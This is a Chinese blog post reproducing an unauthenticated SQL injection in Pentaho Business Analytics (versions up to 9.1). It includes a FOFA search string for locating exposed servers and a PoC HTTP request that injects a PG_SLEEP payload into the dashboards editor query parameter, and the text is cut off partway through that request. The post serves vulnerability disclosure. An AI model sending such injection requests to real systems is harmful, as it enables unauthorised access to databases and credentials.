Pentaho业务分析平台 SQL注入漏洞复现

0xSecl

已于 2023-12-04 17:35:54 修改

阅读量858

点赞数 10

CC 4.0 BY-SA版权

分类专栏：漏洞复现v1 文章标签：安全 web安全

于 2023-12-04 16:23:57 首次发布

本文链接：https://blog.csdn.net/qq_41904294/article/details/134786832

漏洞复现v1 专栏收录该内容

997 篇文章 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

本文介绍了Pentaho Business Analytics存在的SQL注入漏洞，详细阐述了漏洞概述、影响范围，提供了复现环境和步骤，并给出了修复建议，包括厂商发布的修复程序和安全访问策略设置。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

0x01 产品简介

Pentaho Business Analytics是一款使您能够安全地访问、集成、操作、可视化和分析大数据资产的业务分析平台。

0x02 漏洞概述

Pentaho 业务分析平台在/pentaho/api/repos/dashboards/editor路径query参数存在SQL注入漏洞，攻击者可未授权执行任意SQL语句，获取账号密码等敏感信息，进一步接管系统。

0x03 影响范围

Pentaho <= 9.1

0x04 复现环境

FOFA：app="Pentaho-用户控制台"

0x05 漏洞复现

PoC

GET /pentaho/api/repos/dashboards/editor?command=executeQuery&datasource=pentaho_operations_mart&require-cfg.js&query=%3BSELECT+PG_SLEEP%288%29-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like